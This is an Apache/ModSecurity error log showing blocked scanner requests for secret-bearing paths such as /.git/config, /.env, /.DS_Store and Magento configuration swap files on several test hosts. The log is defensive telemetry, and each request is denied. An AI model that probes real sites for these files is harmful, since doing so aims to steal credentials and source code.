[Sat Jan 18 06:00:29.117489 2025] [:error] [pid 546610] [client 36.70.101.74:15959] [client 36.70.101.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z4s1bY9g9vDLxvW-VZuuxQAAAAc"]
[Sat Jan 18 06:00:29.117922 2025] [:error] [pid 546610] [client 36.70.101.74:15959] [client 36.70.101.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/"] [unique_id "Z4s1bY9g9vDLxvW-VZuuxQAAAAc"]
[Sat Jan 18 06:00:30.325163 2025] [:error] [pid 547777] [client 36.70.101.74:15458] [client 36.70.101.74] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/head"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4s1bog9eOa3na69c2WsCAAAAAg"]
[Sat Jan 18 06:00:30.325690 2025] [:error] [pid 547777] [client 36.70.101.74:15458] [client 36.70.101.74] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4s1bog9eOa3na69c2WsCAAAAAg"]
[Sat Jan 18 06:00:30.326144 2025] [:error] [pid 547777] [client 36.70.101.74:15458] [client 36.70.101.74] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/HEAD"] [unique_id "Z4s1bog9eOa3na69c2WsCAAAAAg"]
[Sat Jan 18 06:32:44.295515 2025] [authz_core:error] [pid 548796] [client 167.172.158.128:38940] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/server-status
[Sat Jan 18 06:32:45.369328 2025] [:error] [pid 548799] [client 167.172.158.128:38974] [client 167.172.158.128] ModSecurity: Warning. Matched phrase "/.DS_Store" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.DS_Store found within REQUEST_FILENAME: /.ds_store"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z4s8_UGHhUAmhGH87pWWigAAAAk"]
[Sat Jan 18 06:32:45.369912 2025] [:error] [pid 548799] [client 167.172.158.128:38974] [client 167.172.158.128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z4s8_UGHhUAmhGH87pWWigAAAAk"]
[Sat Jan 18 06:32:45.370436 2025] [:error] [pid 548799] [client 167.172.158.128:38974] [client 167.172.158.128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.DS_Store"] [unique_id "Z4s8_UGHhUAmhGH87pWWigAAAAk"]
[Sat Jan 18 06:32:45.679076 2025] [:error] [pid 548795] [client 167.172.158.128:38984] [client 167.172.158.128] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4s8_fZW5LnNlrly77B3zQAAAAM"]
[Sat Jan 18 06:32:45.679592 2025] [:error] [pid 548795] [client 167.172.158.128:38984] [client 167.172.158.128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4s8_fZW5LnNlrly77B3zQAAAAM"]
[Sat Jan 18 06:32:45.680115 2025] [:error] [pid 548795] [client 167.172.158.128:38984] [client 167.172.158.128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4s8_fZW5LnNlrly77B3zQAAAAM"]
[Sat Jan 18 06:32:45.987624 2025] [:error] [pid 548771] [client 167.172.158.128:38992] [client 167.172.158.128] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z4s8_X92K7zRR9pmTxNd_QAAAAA"]
[Sat Jan 18 06:32:45.988096 2025] [:error] [pid 548771] [client 167.172.158.128:38992] [client 167.172.158.128] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z4s8_X92K7zRR9pmTxNd_QAAAAA"]
[Sat Jan 18 06:32:45.988490 2025] [:error] [pid 548771] [client 167.172.158.128:38992] [client 167.172.158.128] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z4s8_X92K7zRR9pmTxNd_QAAAAA"]
[Sat Jan 18 09:28:48.380353 2025] [:error] [pid 548773] [client 45.148.10.172:34284] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4tmQKZC3xCEUoY5WY5B0AAAAAI"]
[Sat Jan 18 09:28:48.381094 2025] [:error] [pid 548773] [client 45.148.10.172:34284] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4tmQKZC3xCEUoY5WY5B0AAAAAI"]
[Sat Jan 18 09:28:48.381558 2025] [:error] [pid 548773] [client 45.148.10.172:34284] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4tmQKZC3xCEUoY5WY5B0AAAAAI"]
[Sat Jan 18 14:27:16.330801 2025] [:error] [pid 548796] [client 45.148.10.172:34378] [client 45.148.10.172] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4usNF8S2izGeQuswlSduAAAAAY"]
[Sat Jan 18 14:27:16.331357 2025] [:error] [pid 548796] [client 45.148.10.172:34378] [client 45.148.10.172] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4usNF8S2izGeQuswlSduAAAAAY"]
[Sat Jan 18 14:27:16.331653 2025] [:error] [pid 548796] [client 45.148.10.172:34378] [client 45.148.10.172] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4usNF8S2izGeQuswlSduAAAAAY"]
[Sun Jan 19 07:18:23.699430 2025] [:error] [pid 567224] [client 13.211.140.162:59626] [client 13.211.140.162] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4yZL7u_c2mGH524o1jcTgAAAAI"]
[Sun Jan 19 07:18:23.700144 2025] [:error] [pid 567224] [client 13.211.140.162:59626] [client 13.211.140.162] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4yZL7u_c2mGH524o1jcTgAAAAI"]
[Sun Jan 19 07:18:23.700550 2025] [:error] [pid 567224] [client 13.211.140.162:59626] [client 13.211.140.162] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z4yZL7u_c2mGH524o1jcTgAAAAI"]
[Sun Jan 19 09:22:41.473746 2025] [:error] [pid 567225] [client 20.49.7.155:52118] [client 20.49.7.155] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4y2UbWo6TwhZpfDv04yDgAAAAM"]
[Sun Jan 19 09:22:41.474131 2025] [:error] [pid 567225] [client 20.49.7.155:52118] [client 20.49.7.155] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4y2UbWo6TwhZpfDv04yDgAAAAM"]
[Sun Jan 19 09:22:41.474488 2025] [:error] [pid 567225] [client 20.49.7.155:52118] [client 20.49.7.155] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.env"] [unique_id "Z4y2UbWo6TwhZpfDv04yDgAAAAM"]
[Sun Jan 19 20:01:02.093986 2025] [authz_core:error] [pid 578507] [client 185.146.232.19:53372] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.local.xml.swp
[Sun Jan 19 20:01:08.484629 2025] [authz_core:error] [pid 581808] [client 185.146.232.19:38648] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.local.xml.swo
[Sun Jan 19 20:01:14.809720 2025] [authz_core:error] [pid 578498] [client 185.146.232.19:60540] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.local.xml.swn
[Sun Jan 19 20:01:21.014659 2025] [authz_core:error] [pid 578504] [client 185.146.232.19:60548] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.local.xml.swm
[Sun Jan 19 20:01:27.215309 2025] [authz_core:error] [pid 579809] [client 185.146.232.19:50044] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.env.php.swp
[Sun Jan 19 20:01:28.570381 2025] [authz_core:error] [pid 580269] [client 185.146.232.19:50054] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.env.php.swo
[Sun Jan 19 20:01:29.762200 2025] [authz_core:error] [pid 578506] [client 185.146.232.19:50066] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.env.php.swn
[Sun Jan 19 20:01:36.069982 2025] [authz_core:error] [pid 579559] [client 185.146.232.19:34846] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/app/etc/.env.php.swm
[Mon Jan 20 08:45:42.495297 2025] [:error] [pid 588593] [client 45.148.10.80:43112] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z43_Jt30P4n6a6OpUUZl8AAAAAU"]
[Mon Jan 20 08:45:42.495918 2025] [:error] [pid 588593] [client 45.148.10.80:43112] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z43_Jt30P4n6a6OpUUZl8AAAAAU"]
[Mon Jan 20 08:45:42.496322 2025] [:error] [pid 588593] [client 45.148.10.80:43112] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z43_Jt30P4n6a6OpUUZl8AAAAAU"]
[Mon Jan 20 08:45:42.579599 2025] [:error] [pid 590411] [client 45.148.10.80:43128] [client 45.148.10.80] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z43_Jorp2h0GRuZuIsus-gAAAAY"]
[Mon Jan 20 08:45:42.580389 2025] [:error] [pid 590411] [client 45.148.10.80:43128] [client 45.148.10.80] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z43_Jorp2h0GRuZuIsus-gAAAAY"]
[Mon Jan 20 08:45:42.581336 2025] [:error] [pid 590411] [client 45.148.10.80:43128] [client 45.148.10.80] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.git/config"] [unique_id "Z43_Jorp2h0GRuZuIsus-gAAAAY"]
[Mon Jan 20 13:42:56.790643 2025] [:error] [pid 588662] [client 185.246.189.156:40590] [client 185.246.189.156] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z45E0ImPN6iRLe2XIDmGcwAAAAw"]
[Mon Jan 20 13:42:56.791531 2025] [:error] [pid 588662] [client 185.246.189.156:40590] [client 185.246.189.156] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z45E0ImPN6iRLe2XIDmGcwAAAAw"]
[Mon Jan 20 13:42:56.792061 2025] [:error] [pid 588662] [client 185.246.189.156:40590] [client 185.246.189.156] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/.git/config"] [unique_id "Z45E0ImPN6iRLe2XIDmGcwAAAAw"]
[Tue Jan 21 15:11:55.543970 2025] [:error] [pid 610100] [client 193.41.206.36:38600] [client 193.41.206.36] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4-rK2Y8EQlvDFc9fXAzTgAAAAU"]
[Tue Jan 21 15:11:55.545858 2025] [:error] [pid 610100] [client 193.41.206.36:38600] [client 193.41.206.36] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4-rK2Y8EQlvDFc9fXAzTgAAAAU"]
[Tue Jan 21 15:11:55.546412 2025] [:error] [pid 610100] [client 193.41.206.36:38600] [client 193.41.206.36] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.test.indacotrentino.com"] [uri "/.env"] [unique_id "Z4-rK2Y8EQlvDFc9fXAzTgAAAAU"]
